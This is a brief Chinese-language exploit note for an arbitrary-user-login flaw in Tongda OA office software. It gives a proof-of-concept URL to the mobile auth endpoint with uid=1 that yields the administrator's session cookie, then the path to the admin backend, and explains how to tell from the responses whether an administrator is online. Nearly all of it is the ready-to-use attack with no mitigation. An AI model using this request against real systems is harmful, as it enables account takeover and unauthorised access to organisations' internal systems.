通达OA任意用户登录

描述

访问http://xx.xx.x.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0链接后即可获得管理员cookie，直接访问/general/目录进入后台即可

漏洞利用条件

管理员在线

POC

http://xx.xx.x.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
/general/

访问异常路径出现空白页面则表示管理员在线直接尝试/general/目录查看sessionid是否成功覆盖
访问出现RELOGIN则表示管理员不在线